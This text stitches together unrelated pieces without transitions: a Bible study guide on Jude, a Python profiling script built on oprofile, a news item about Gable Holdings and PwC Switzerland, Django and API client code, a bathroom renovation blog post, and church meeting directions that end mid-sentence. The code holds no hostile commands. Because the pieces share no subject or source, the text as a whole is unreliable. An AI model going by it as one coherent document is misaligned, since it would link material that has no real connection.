Beloved, although I was very eager to write to you about our common salvation, I found it necessary to write appealing to you to contend for the faith that was once for all delivered to the saints. For certain people have crept in unnoticed who long ago were designated for this condemnation, ungodly people, who pervert the grace of our God into sensuality and deny our only Master and Lord, Jesus Christ. Now I want to remind you, although you once fully knew it, that Jesus, who saved a people out of the land of Egypt, afterward destroyed those who did not believe. And the angels who did not stay within their own position of authority, but left their proper dwelling, he has kept in eternal chains under gloomy darkness until the judgment of the great day— just as Sodom and Gomorrah and the surrounding cities, which likewise indulged in sexual immorality and pursued unnatural desire, serve as an example by undergoing a punishment of eternal fire. Main point: To whose authority do we listen or submit: our own or Jesus'? 1. What situation is Jude addressing in his letter? 2. Share a time when someone called you out, rebuked you or held you accountable? 3. Jude uses a well-known illustation from extrabiblical literature about Michael rebuking Satan? By who's authority did Michael rebuke Satan? What do we learn from this example about how we are to rebuke? 4. In what areas of life should Jesus' be our final authority? How does he communicate that authority today (Heb 1:1-2; John 10:35; Matthew 5:17-19; 12:38-42; 19:4-5)? 5. List the authorities in your life. Where you place yourself in that list? How do these authorities help you make practical decisions (at work, with finances, in spiritual life)? 6. Like the wolves' blood-frozen blade story that Scott mentioned in his sermon, many of our authorities are deceptive. How can you lead your family and friends to learn that Jesus' authority is good and not self-destructive? Personal Response: Pray through the benediction in Jude 23-25. Commit it to memory between now and the next time your community group meets. Consider memorizing it as a family.
import re import subprocess import socket import calibration_data_generator as cdg import output_processing as op import datetime def run_the_function(print_result, height, width, repeat, text_file_name, grain_size): path_name= "./data/KnifeQuadBPos1_2_21_int16.h5" top_level_data_set_name= "KnifeQuadBPos1/" host_name = socket.gethostname() #Program to execute debug_version = './Debug/cppProcessing2.0 ' profile_version = './Profiling/cppProcessing2.0 ' parallel_debug = './parallel_debug/cppProcessing2.0 ' parallel_profile = './parallel_profile/cppProcessing2.0 ' cmdl_arg = '1 ' + str(width) + ' '+ str(height) + ' ' + str(repeat) + ' ' + text_file_name + ' ' + str(grain_size) + ' 1' program_to_execute = parallel_profile + cmdl_arg #events to monitor #instructions event1 = op.oprofile_events('CPU_CLK_UNHALTED','0x00',100000000) event2 = op.oprofile_events('INST_RETIRED','0x00',60000000) #cache misses event3 = op.oprofile_events('LLC_MISSES','0x41',60000) #divide by LLC_REFS # event4 = op.oprofile_events('l2_lines_in','0x07',1000000) #100000 # event5 = op.oprofile_events('br_inst_retired', '0x01', 400000) #total branch instructions retired # event6 = op.oprofile_events('br_misp_retired', '0x01', 400000) #total mispredicted branches. Divide by br_inst_retired event6 = op.oprofile_events('mem_trans_retired','0x02',2000000) # event7 = op.oprofile_events('uops_retired', 'stall_cycles',2000000) #no of stall cycles. Divide by cpu cycles # # event8 = op.oprofile_events('dtlb_load_misses', '0x01',2000000) # # event8 = op.oprofile_events('dtlb_load_misses', '0x81',1000) #Ivy Bridge # # event9 = op.oprofile_events('LLC_REFS', '0x4f',6000) # # event10 = op.oprofile_events('l1d_pend_miss', 'pending',2000000) #cycles of l1d misses outstanding. Divide by CPU cycles # event11 = op.oprofile_events('resource_stalls', '0x01',2000000) #no of stall cycles/divide by number of instructions # event12 = op.oprofile_events('l1d', '0x01',2000000) #cycles of l1d misses outstanding. Divide by CPU cycles list_of_events = [event1, event2, event3, event6]#, event7, event8, event9, event10, event11, event12] #variable initialisation dict_of_attributes = {} total_time = 0.0 dict_of_function_perc_time = {} list_of_events_recorded = [] image_size = width * height * 2 #memory size total_processing_time = 0.0 operf_events = op.get_operf_option(list_of_events) result_directory = './oprof_reports/'+ host_name + '/' report_destination = result_directory + 'profile_report.txt' sample_data_destination = result_directory + 'oprof_data/' #commandline options cmd_git = 'git rev-parse HEAD > ' + report_destination cmd_time = '(/usr/bin/time -v ' + program_to_execute + ') &>> ' + report_destination cmd_operf = 'operf ' + '-d ' + sample_data_destination + ' ' + operf_events + ' '+ program_to_execute cmd_opreport = 'opreport --symbols --session-dir=' + sample_data_destination + ' >> ' + report_destination cmd_mkdir = 'mkdir -p ' + sample_data_destination cmd_annotate = 'opannotate -s --output-dir=' + result_directory + 'annotated/ ' + '--session-dir=' + sample_data_destination + ' '+ program_to_execute op.cmd_call(cmd_git) op.cmd_call(cmd_time) op.cmd_call(cmd_operf) op.cmd_call(cmd_opreport) op.cmd_call(cmd_mkdir) op.cmd_call(cmd_annotate) f = open(report_destination, 'r') list_of_functions = op.get_function_list(f) f.close() for function_name in list_of_functions: dict_of_function_perc_time[function_name] = 0 dict_of_attributes[function_name] = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0] f = open(report_destination, 'r') s = f.readline() commit_key = s; while s != '': if 'Counted' in s: for event in list_of_events: if (event.event_name + ' events') in s: list_of_events_recorded.append(event) if 'Elapsed (wall clock) time ' in s: total_time = op.parse_time(s) for function_name in list_of_functions: if function_name in s: delimited = s.split(' ') parsed = [item for item in delimited if item != ''] attributes = [] dict_of_function_perc_time[function_name] = float(parsed[1]) + dict_of_function_perc_time[function_name] for index in xrange(len(list_of_events_recorded)): # manually add the percentage clock cycles attributes.append( float(parsed[index * 2]) + dict_of_attributes[function_name][index] ) dict_of_attributes[function_name] = attributes s = f.readline() llc_misses_per_instruction = op.get_llc_misses(list_of_functions, dict_of_attributes, list_of_events_recorded) CPI = op.get_CPI(list_of_functions, dict_of_attributes, list_of_events_recorded) bandwidth = op.get_bandwidth(list_of_functions, dict_of_function_perc_time, total_time, image_size, repeat) function_time = op.get_time(list_of_functions, dict_of_function_perc_time, total_time, repeat) l1d_miss_rate = op.get_L1D_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded) DTLB_miss_rate = op.get_DTLB_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded) LLC_miss_rate = op.get_LLC_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded) br_misspre_rate = op.get_br_mispre_rate(list_of_functions, dict_of_attributes, list_of_events_recorded) resource_stall = op.get_resource_stall_rate(list_of_functions, dict_of_attributes, list_of_events_recorded) l2_miss_rate = op.get_L2_miss_rate(list_of_functions, dict_of_attributes, list_of_events_recorded) l1d_repl_rate = op.get_L1D_repl_rate(list_of_functions, dict_of_attributes, list_of_events_recorded) memory_bandwidth = op.get_memory_bandwidth(list_of_functions, dict_of_attributes, list_of_events_recorded) for name, perc_time in dict_of_function_perc_time.iteritems(): total_processing_time = total_processing_time + perc_time * total_time /1000 /100 #in seconds #printing reports if print_result == True: print print datetime.datetime.now().date(), print datetime.datetime.now().time(), print 'Report:' print cmd_time print cmd_operf print cmd_opreport print 'oprofile sample directory: ' + sample_data_destination print cmd_annotate print '=' * 100 print commit_key, print 'operf ' + '-d ' + sample_data_destination + ' ' + operf_events + ' '+ program_to_execute print 'The program took {0:.4} ms in total. {1:.4} ms per sample/reset pair.'.format(total_time, total_time/repeat) print 'Of which the processing functions took in total {0:.4} ms to run.'.format(total_processing_time) print 'Image size {0:d} ({1:d} * {2:d}) pixels.'.format(width * height, height, width), print op.get_bytes(image_size) print 'Statistics collected for '+str(repeat)+' iterations' print 'Bandwidth:' print '\t' + 'Total: {0:.4} MB/s'.format(op.get_bytes(image_size * 2 * repeat/total_processing_time) ) #2 because of sample and reset for function in list_of_functions: index = list_of_functions.index(function) print '\t' + function +':' + '{0}'.format(op.get_bytes((bandwidth[index]))) + '/s' print 'LLC misses per instruction:' for function in list_of_functions: index = list_of_functions.index(function) print '\t' + function +':' + '{0:.2%}'.format(llc_misses_per_instruction[index]) print 'Cycle per instruction (CPI):' for function in list_of_functions: index = list_of_functions.index(function) print '\t' + function +':' + '{0:.2}'.format(CPI[index]) print 'Processing time (ms) for each call:' for function in list_of_functions: index = list_of_functions.index(function) print '\t' + function +':' + '{0}'.format(int(function_time[index])) if len(l1d_miss_rate) != 0: print 'L1D misses percentage:' for function in list_of_functions: index = list_of_functions.index(function) print '\t' + function +':' + '{0:.2%}'.format(l1d_miss_rate[index]) if len(l1d_repl_rate) != 0: print 'L1D replacement rate:' for function in list_of_functions: index = list_of_functions.index(function) print '\t' + function +':' + '{0:.2%}'.format(l1d_repl_rate[index]) if len(l2_miss_rate) != 0: print 'L2 misses percentage:' for function in list_of_functions: index = list_of_functions.index(function) print '\t' + function +':' + '{0:.2%}'.format(l2_miss_rate[index]) if len(DTLB_miss_rate) != 0: print 'DTLB miss per instruction:' for function in list_of_functions: index = list_of_functions.index(function) print '\t' + function +':' + '{0:.2}'.format(DTLB_miss_rate[index]) if len(LLC_miss_rate) != 0: print 'LLC miss rate:' for function in list_of_functions: index = list_of_functions.index(function) print '\t' + function +':' + '{0:.2%}'.format(LLC_miss_rate[index]) if len(br_misspre_rate) != 0: print 'Branch misprediction percentage:' for function in list_of_functions: index = list_of_functions.index(function) print '\t' + function +':' + '{0:.2%}'.format(br_misspre_rate[index]) if len(resource_stall) != 0: print 'Resource stall cycle percentage:' for function in list_of_functions: index = list_of_functions.index(function) print '\t' + function +':' + '{0:.2%}'.format(resource_stall[index]) if len(memory_bandwidth) != 0: print 'Memory Bandwidth' for function in list_of_functions: index = list_of_functions.index(function) print '\t' + function +':' + op.get_bytes(memory_bandwidth[index]) print '=' * 100 return image_size * 2 * repeat/total_processing_time repeat = 100 #350 is about the maximum # width_arr = [2000, 5000, 10000, 20000, 50000, 100000, 500000] height = 3717 width = 3528 host_name = socket.gethostname() calib_directory = './calibration_data/' path_name = calib_directory + host_name + '/' text_file_name = path_name + 'test_param_file.txt' grain_size_file_name = './oprof_reports/' + host_name + '/' + 'grain_size_test.txt' print grain_size_file_name # subprocess.call('mkdir -p ' + path_name, shell=True) # cdg.generate_calib_files(height, width, text_file_name, path_name) # cmd_rm_file = "rm -f " + grain_size_file_name # cmd_create_file = "touch "+ grain_size_file_name # op.cmd_call(cmd_rm_file) # op.cmd_call(cmd_create_file) grain_size = 3528 * 2 run_the_function(True, height, width, repeat, text_file_name, grain_size) # 1,3,7,9,21, 59,63,177,413,531, # * 1239,3717 # for grain_size in (3528, 3528/2,3528/3,3528/4,3528/6,3528/7, 3528*3, 3528*7,3528*9, 3528*21, 3528*59, 3528*63, 3528*177,3528*413,3528*531,3528*1239): # a = op.accumulator(grain_size_file_name, grain_size, 2) # for repeats in xrange(1,2): # bandwidth = run_the_function(True, height, width, repeat, text_file_name, grain_size) # a.add_number(bandwidth) # print grain_size, op.get_bytes(bandwidth) # a.average() # # print 'starting' # grain_size = 20 # run_the_function(True, height, width, repeat, text_file_name, grain_size) # for index in xrange(9, 41): # run_the_function(True, height, width, repeat, text_file_name, index) # print index # for grain_size in xrange(10000,1000000,2000): # a = op.accumulator(grain_size_file_name, grain_size, 9) # for repeats in xrange(1,9): # bandwidth = run_the_function(False, height, width, repeat, text_file_name, grain_size) # a.add_number(bandwidth[0]) # print grain_size, op.get_bytes(bandwidth[0]) # a.average() # # # width = 50000 # repeat_arr = [1,2,5,10,20,50,100] # for repeat in repeat_arr: # run_the_function(True, width, repeat) #operf -e CPU_CLK_UNHALTED=100000:0:1:1,mem_load_uops_llc_hit_retired=100000:2:1:1,mem_load_uops_llc_hit_retired=100000:4:1:1,mem_load_uops_retired=100000:4:1:1, ./Debug/cppProcessing2.0 0 ./data/KnifeQuadBPos1_2_21_int16.h5 KnifeQuadBPos1/ 500
Gable Holdings has launched a fresh attack on PwC Switzerland, the administrator of its troubled insurance subsidiary, branding one of its assertions a “falsehood”. PwC said last week that Gable Holdings was represented at the 11 November shareholders’ meeting for Gable Insurance AG (GIAG) by Dr Stefan Becker. This was despite Gable Holdings’ previous assertion that it PwC had excluded it from the meeting, which it alleged at the time was “illegal”. In a statement issued this morning, Gable Holdings said PwC’s assertion that it was represented at the meeting by Becker was “a falsehood”. Gable Holdings said PwC had initially tried to prevent Gable Holdings from attending the GIAG shareholders’ meeting but conceded that Becker, Gable Holdings’ legal representative, could attend. But added that PwC’s local counsel told Becker and Gable Holdings that all voting rights at the meeting would be represented by PwC. Gable Holdings is the sole shareholder of Liechtenstein-based GIAG. Liechtentein’s financial regulator, the FMA, appointed PwC Switzerland in October to take over the run-off of Gable. PwC held a meeting for GIAG shareholders on 11 November to see if further capital could be injected to stave off formal bankruptcy proceedings. The administrator believes the insurer is “over-indebted” – an analysis Gable Holdings rejects. In this morning’s statement, Gable Holdings reiterated that it had taken legal action in the Liechtenstein court to have PwC removed as administrator and over the “illegal” shareholders’ meeting.
#!/usr/bin/python # -*- coding: utf-8 -*- # # Copyright (C) 2012 rambla.eu # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.import os import json, os import raws_json from raws_json.raws_service import RawsService class RamsService(RawsService): def __init__(self, username, password, server=None, ssl = True): """ Constructor for RamsService, used to send request to the RATS service. :param username: Name of your Rambla user account :param password: Pwd of your Rambla user account :param server: Domain name of the RATS service (optional, default = "rams.enc01.rambla.be") :param ssl: Set True to use SSL (your account must be SSL enabled) (optional, default = False) """ self.username = username if server is None: server = "rams.mon01.rambla.be" super(RamsService, self).__init__(username = username, password = password, server = server, ssl = ssl) def delete(self, uri): """ Deletes any resource, given the uri. """ return self.Delete(uri = uri) def getTotal(self, query = None): """ Retrieves a total feed. @return JobEntry object """ uri = "/total/" if query: query.feed = uri uri = query.ToUri() return self.Get(uri = uri) def getTraffic(self, query = None): """ Retrieves a total feed. @return JobEntry object """ uri = "/traffic/" if query: query.feed = uri uri = query.ToUri() return self.Get(uri = uri) def getStorage(self, query = None): """ Retrieves a total feed. @return JobEntry object """ uri = "/storage/" if query: query.feed = uri uri = query.ToUri() return self.Get(uri = uri)
1. The Europa world of learning. 3. Reports of the president and the treasurer. New York, John Simon Guggenheim Memorial Foundation.
########################################################################### # (C) Vrije Universiteit, Amsterdam (the Netherlands) # # # # This file is part of AmCAT - The Amsterdam Content Analysis Toolkit # # # # AmCAT is free software: you can redistribute it and/or modify it under # # the terms of the GNU Affero General Public License as published by the # # Free Software Foundation, either version 3 of the License, or (at your # # option) any later version. # # # # AmCAT is distributed in the hope that it will be useful, but WITHOUT # # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or # # FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public # # License for more details. # # # # You should have received a copy of the GNU Affero General Public # # License along with AmCAT. If not, see <http://www.gnu.org/licenses/>. # ########################################################################### from amcat.models import Codebook from rest_framework.views import APIView from rest_framework.response import Response from rest_framework.exceptions import APIException from api.rest.resources.amcatresource import AmCATResource from django.conf.urls import url import collections import itertools MAX_CODEBOOKS = 5 CACHE_LABELS = (2, 1) def _walk(nodes): """Convert all TreeItems to dictionaries""" for node in nodes: node = node._asdict() node['children'] = tuple(_walk(node['children'])) yield node class CodebookHierarchyResource(AmCATResource): """ This resource has no direct relationship to one model. Instead, it's composed of multiple codebooks. A thorough documentation of the design of these hierarchies is available on the AmCAT wiki: - https://code.google.com/p/amcat/wiki/Codebook Any filters applied to this resource translate directly to filters on codebooks. For example, you could request the hierarchy of codebook with id '5' using the following query: - /codebookhierarchy?id=5 Two special filters can be applied to hierarchies: - include_missing_parents - include_hidden Each filter displayed above can either be true or false and do not rely on each other. Both default to true. """ # ^ Docstring displayed on API web-page as documentation model = Codebook @classmethod def get_url_pattern(cls): """The url pattern for use in the django urls routing table""" pattern = r'^{}$'.format(cls.get_view_name()) return url(pattern, cls.as_view(), name=cls.get_view_name()) @classmethod def get_view_name(cls): return cls.__name__[:-8].lower() @classmethod def get_model_name(cls): return "codebookhierarchy" @classmethod def get_tree(cls, codebook, include_labels=True, **kwargs): """Codebook.get_tree() with caching enabled""" codebook.cache() codebook.cache_labels() return tuple(_walk(codebook.get_tree(include_labels=include_labels, **kwargs))) def _get(self, request, *args, **kwargs): qs = self.filter_queryset(self.get_queryset()) if len(qs) > MAX_CODEBOOKS: return ("Please select at most {} codebook(s)".format(MAX_CODEBOOKS),) else: return itertools.chain.from_iterable(self.get_tree(codebook) for codebook in qs) def get(self, request, *args, **kwargs): return Response(self._get(request, *args, **kwargs)) class CodebookResource(AmCATResource): model = Codebook extra_filters = ["codingschemafield__codingschema__id"] from amcat.models import Label from api.rest.resources.amcatresource import AmCATResource class LabelResource(AmCATResource): model = Label extra_filters = ["code__codebook_codes__codebook__id"]
Before!! MLS listing photo. Note the pendant light and wallpaper! I am excited to be sharing another room update today! Our powder bath has a pretty dramatic before and after! I originally had thick, golden brown wallpaper and brown light pendants. It had the same honey maple colored cabinets as the rest of the house did. One of our favorite things to look back on was the amazing mirror that covered most of the wall and had a funky wave at the top. This was one of the first rooms we finished in the renovation. We painted the cabinetry and updated the hardware – crazy what a difference hardware makes! The pendant lights were taken down and replaced with can lighting – I hope to add a fun light fixture in here at some point – the ceilings are very high, so I have the space to add a fun chandelier. We took down the giant mirror and replaced it with a pretty hung mirror. The wallpaper was taken down and the walls were painted this pretty navy. I chose gold accents and pops of blush, and hot pink. The artwork fit the space perfectly and pulled all the colors together.
# -*- coding: utf-8 -*- """ :Autor: Adriano Leal :Aluno: 11951 :email: l911911951@alunos.ipbeja.pt """ from django import template from django.http.response import HttpResponse from django.shortcuts import render_to_response from django.template import RequestContext from iot.models import Equipment, PhysicalCharacteristic, Voltage, Memory, \ Microcontroller, Microcomputer, GPU, Interface, Processor, Sensor, Template def criar(request): """ Cria ficheiros .json com os dados contidos na base de dados. """ microcontrolador = Microcontroller.objects.filter() file_microcontroller = open("iot/fixtures/microcontroller.json", "w") file_microcontroller.write("[\n") qt = len(microcontrolador) for item in microcontrolador: file_microcontroller.write("\t{\n") file_microcontroller.write("\t\t\"model\": \"iot.Microcontroller\",\n") file_microcontroller.write("\t\t\"pk\": \"" + str(item.id) + "\",\n") file_microcontroller.write("\t\t\"fields\": {\n") file_microcontroller.write("\t\t\"type\" : \"" + (item.type).encode("utf-8\n") + "\",\n") file_microcontroller.write("\t\t\"clockSpeed\" : " + str(item.clockSpeed) + ",\n") file_microcontroller.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n") file_microcontroller.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n") file_microcontroller.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n") file_microcontroller.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n") file_microcontroller.write("\t}\n") if qt > 1: file_microcontroller.write("},\n") else: file_microcontroller.write("}\n") qt -= 1 file_microcontroller.write("]\n") file_microcontroller.close() microComputer = Microcomputer.objects.filter() file_microComputer = open("iot/fixtures/microComputer.json", "w") file_microComputer.write("[\n") qt = len(microComputer) for item in microComputer: file_microComputer.write("\t{\n") file_microComputer.write("\t\t\"model\": \"iot.Microcomputer\",\n") file_microComputer.write("\t\t\"pk\": \"" + str(item.id) + "\",\n") file_microComputer.write("\t\t\"fields\": {\n") file_microComputer.write("\t\t\"name\" : \"" + (item.name).encode("utf-8\n") + "\",\n") file_microComputer.write("\t\t\"model\" : \"" + (item.model).encode("utf-8\n") + "\",\n") if item.processor_id==None: file_microComputer.write("\t\t\"processor\" : null,\n") else: file_microComputer.write("\t\t\"processor\" : " + str(item.processor_id) + ",\n") if item.microcontroller_id==None: file_microComputer.write("\t\t\"microcontroller\" : null,\n") else: file_microComputer.write("\t\t\"microcontroller\" : " + str(item.microcontroller_id) + ",\n") if item.GPU_id==None: file_microComputer.write("\t\t\"GPU\" : null,\n") else: file_microComputer.write("\t\t\"GPU\" : " + str(item.GPU_id) + ",\n") if item.operatingSystems_id==None: file_microComputer.write("\t\t\"operatingSystems\" : null,\n") else: file_microComputer.write("\t\t\"operatingSystems\" : " + str(item.operatingSystems_id) + ",\n") file_microComputer.write("\t\t\"dateManufacture\" : \"" + str(item.dateManufacture) + "\",\n") file_microComputer.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n") file_microComputer.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n") file_microComputer.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n") file_microComputer.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n") file_microComputer.write("\t}\n") if qt > 1: file_microComputer.write("},\n") else: file_microComputer.write("}\n") qt -= 1 file_microComputer.write("]\n") file_microComputer.close() caracteristica = PhysicalCharacteristic.objects.filter() file_caracteristica = open("iot/fixtures/physicalCharacteristic.json", "w") file_caracteristica.write("[\n") qt = len(caracteristica) for item in caracteristica: file_caracteristica.write("\t{\n") file_caracteristica.write("\t\t\"model\": \"iot.PhysicalCharacteristic\",\n") file_caracteristica.write("\t\t\"pk\": " + str(item.id) + ",\n") file_caracteristica.write("\t\t\"fields\": {\n") file_caracteristica.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n") file_caracteristica.write("\t\t\"length\" : " + str(item.length) + ",\n") file_caracteristica.write("\t\t\"width\" : " + str(item.width) + ",\n") file_caracteristica.write("\t\t\"weight\" : " + str(item.weight) + "\n") file_caracteristica.write("\t}\n") if qt > 1: file_caracteristica.write("},\n") else: file_caracteristica.write("}\n") qt -= 1 file_caracteristica.write("]\n") file_caracteristica.close() gpu = GPU.objects.filter() file_gpu = open("iot/fixtures/gpu.json", "w") file_gpu.write("[\n") qt = len(gpu) for item in gpu: file_gpu.write("\t{\n") file_gpu.write("\t\t\"model\": \"iot.GPU\",\n") file_gpu.write("\t\t\"pk\": " + str(item.id) + ",\n") file_gpu.write("\t\t\"fields\": {\n") file_gpu.write("\t\t\"type\" : \"" + (item.type).encode("utf-8\n") + "\",\n") file_gpu.write("\t\t\"clockSpeed\" : " + str(item.clockSpeed) + ",\n") file_gpu.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n") file_gpu.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n") file_gpu.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n") file_gpu.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n") file_gpu.write("\t}\n") if qt > 1: file_gpu.write("},\n") else: file_gpu.write("}\n") qt -= 1 file_gpu.write("]\n") file_gpu.close() memory = Memory.objects.filter() file_memory = open("iot/fixtures/memory.json", "w") file_memory.write("[\n") qt = len(memory) for item in memory: file_memory.write("\t{\n") file_memory.write("\t\t\"model\": \"iot.Memory\",\n") file_memory.write("\t\t\"pk\": " + str(item.id) + ",\n") file_memory.write("\t\t\"fields\": {\n") file_memory.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n") file_memory.write("\t\t\"RAM\" : \"" + str(item.RAM) + "\",\n") file_memory.write("\t\t\"SRAM\" : \"" + str(item.SRAM) + "\",\n") file_memory.write("\t\t\"EEPROM\" : \"" + str(item.EEPROM) + "\",\n") file_memory.write("\t\t\"flashMemory\" : \"" + str(item.flashMemory) + "\"\n") file_memory.write("\t}\n") if qt > 1: print " > 1", qt file_memory.write("},\n") else: print " == 1", qt file_memory.write("}\n") qt -= 1 file_memory.write("]\n") file_memory.close() voltage = Voltage.objects.filter() file_voltage = open("iot/fixtures/voltage.json", "w") file_voltage.write("[\n") qt = len(voltage) for item in voltage: file_voltage.write("\t{\n") file_voltage.write("\t\t\"model\": \"iot.Voltage\",\n") file_voltage.write("\t\t\"pk\": " + str(item.id) + ",\n") file_voltage.write("\t\t\"fields\": {\n") file_voltage.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n") file_voltage.write("\t\t\"operatingVoltage\" : " + str(item.operatingVoltage) + ",\n") file_voltage.write("\t\t\"inputVoltageRecommended\" : \"" + str(item.inputVoltageRecommended) + "\",\n") file_voltage.write("\t\t\"IOCurrentMax\" : \"" + str(item.IOCurrentMax) + "\",\n") file_voltage.write("\t\t\"DCCurrentfor3_3VPin\" : \"" + str(item.DCCurrentfor3_3VPin) + "\",\n") file_voltage.write("\t\t\"powerRatings\" : \"" + str(item.powerRatings) + "\",\n") file_voltage.write("\t\t\"powerSource\" : \"" + str(item.powerSource) + "\"\n") file_voltage.write("\t}\n") if qt > 1: print " > 1", qt file_voltage.write("},\n") else: print " == 1", qt file_voltage.write("}\n") qt -= 1 file_voltage.write("]\n") file_voltage.close() interface = Interface.objects.filter() file_interface = open("iot/fixtures/interface.json", "w") file_interface.write("[\n") qt = len(interface) for item in interface: file_interface.write("\t{\n") file_interface.write("\t\t\"model\": \"iot.Interface\",\n") file_interface.write("\t\t\"pk\": \"" + str(item.id) + "\",\n") file_interface.write("\t\t\"fields\": {\n") file_interface.write("\t\t\"microComputer\" : " + str(item.microComputer_id) + ",\n") file_interface.write("\t\t\"hdmi\" : \"" + (item.hdmi).encode("utf-8\n") + "\",\n") file_interface.write("\t\t\"videoInput\" : \"" + (item.videoInput).encode("utf-8\n") + "\",\n") file_interface.write("\t\t\"videoOutputs\" : \"" + (item.videoOutputs).encode("utf-8\n") + "\",\n") file_interface.write("\t\t\"audioInputs\" : \"" + (item.audioInputs).encode("utf-8\n") + "\",\n") file_interface.write("\t\t\"audioOutputs\" : \"" + (item.audioOutputs).encode("utf-8\n") + "\",\n") file_interface.write("\t\t\"storage\" : \"" + (item.storage).encode("utf-8\n") + "\",\n") file_interface.write("\t\t\"network\" : \"" + (item.network).encode("utf-8\n") + "\",\n") file_interface.write("\t\t\"wifi\" : \"" + (item.wifi).encode("utf-8\n") + "\",\n") file_interface.write("\t\t\"jack\" : \"" + (item.jack).encode("utf-8\n") + "\",\n") file_interface.write("\t\t\"GPIO\" : \"" + (item.GPIO).encode("utf-8\n") + "\",\n") file_interface.write("\t\t\"digitalIOPins\" : " + str(item.digitalIOPins) + ",\n") file_interface.write("\t\t\"analogInputPins\" : " + str(item.analogInputPins) + "\n") file_interface.write("\t}\n") if qt > 1: file_interface.write("},\n") else: file_interface.write("}\n") qt -= 1 file_interface.write("]\n") file_interface.close() processor = Processor.objects.filter() file_processor = open("iot/fixtures/processor.json", "w") file_processor.write("[\n") qt = len(processor) for item in processor: file_processor.write("\t{\n") file_processor.write("\t\t\"model\": \"iot.Processor\",\n") file_processor.write("\t\t\"pk\": " + str(item.id) + ",\n") file_processor.write("\t\t\"fields\": {\n") file_processor.write("\t\t\"type\" : \"" + (item.type).encode("utf-8\n") + "\",\n") file_processor.write("\t\t\"clockSpeed\" : " + str(item.clockSpeed) + ",\n") file_processor.write("\t\t\"userCreation\" : " + str(item.userCreation_id) + ",\n") file_processor.write("\t\t\"userAmendment\" : " + str(item.userAmendment_id) + ",\n") file_processor.write("\t\t\"dateTimeCreation\" : \"" + str(item.dateTimeCreation) + "\",\n") file_processor.write("\t\t\"dateTimeChange\" : \"" + str(item.dateTimeChange) + "\"\n") file_processor.write("\t}\n") if qt > 1: file_processor.write("},\n") else: file_processor.write("}\n") qt -= 1 file_processor.write("]\n") file_processor.close() sensor = Sensor.objects.filter() file_sensor = open("iot/fixtures/sensor.json", "w") file_sensor.write("[\n") qt = len(sensor) for item in sensor: file_sensor.write("\t{\n") file_sensor.write("\t\t\"model\": \"iot.Sensor\",\n") file_sensor.write("\t\t\"pk\": " + str(item.id) + ",\n") file_sensor.write("\t\t\"fields\": {\n") file_sensor.write("\t\t\"name\" : \"" + (item.name).encode("utf-8\n") + "\",\n") file_sensor.write("\t\t\"serialNumber\" : \"" + (item.serialNumber).encode("utf-8\n") + "\",\n") file_sensor.write("\t\t\"model\" : \"" + (item.model).encode("utf-8\n") + "\",\n") file_sensor.write("\t\t\"function\" : \"" + (item.function).encode("utf-8\n") + "\"\n") file_sensor.write("\t}\n") if qt > 1: file_sensor.write("},\n") else: file_sensor.write("}\n") qt -= 1 file_sensor.write("]\n") file_sensor.close() template = Template.objects.filter() file_template = open("iot/fixtures/template.json", "w") file_template.write("[\n") qt = len(template) for item in template: file_template.write("\t{\n") file_template.write("\t\t\"model\": \"iot.Template\",\n") file_template.write("\t\t\"pk\": " + str(item.id) + ",\n") file_template.write("\t\t\"fields\": {\n") file_template.write("\t\t\"name\" : \"" + (item.name).encode("utf-8\n") + "\",\n") file_template.write("\t\t\"imagePath\" : \"" + (item.imagePath).encode("utf-8\n") + "\"\n") #---------------------------------------------------- for i in template: #--------------------------------------- for j in i.equipment.all(): # file_template.write("\t\t\"equipment\" : " + str(j.id) + ",\n") file_template.write("\t}\n") if qt > 1: file_template.write("},\n") else: file_template.write("}\n") qt -= 1 file_template.write("]\n") file_template.close() return HttpResponse("Ficheiros gerados com sucesso!\n")
The Presbytery of Sheppards and Lapsley has four stated meetings each year. Presbytery Packets are available below-left, and minutes from previous meetings are below-right. Presbytery Packets will be posted 10 days before an upcoming meeting. Our Spring Stated meeting will be May 16, 2019 at Living River: A Retreat on the Cahaba, 2000 Living River Parkway, Montevallo, AL 35115. (205-208-0035) Registration begins at 9:00 AM. South on I-65 to Exit 234 (Shelby Co. Airport) Left on CR-87 S turns into CR-12 W for 1.5 miles until it deadends. Right on CR-22 for 9.6 miles until it deadends. Right on CR-10 for 5.5 miles. When you see CR-251 on the Right continue on CR-10 for .8 miles. Turn Right onto Living River Parkway. Living River is several miles back. North on I-65 to Exit 228 (Calera/University of Montevallo Hwy). Left on SR 25; follow this road 7.1 miles to junction with SR 155 (traffic light). Right onto SR 155 for .5 miles where the road changes to CR-10 at traffic light (downtown Montevallo). Continue on CR-10 for 11.9 miles to the camp entrance. Turn Right onto Living River Parkway. Living River is several miles back. DO NOT turn Left toward the “Business District,” but instead turn Left onto HWY 24 for 7.5 miles toward West Blocton. At stop sign veer Left onto CR-65 for 6.6 miles. (CR-65 changes names to ”Marvel Road”) Turn Left onto Living River Parkway. Living River is several miles back. If you are unable to attend a 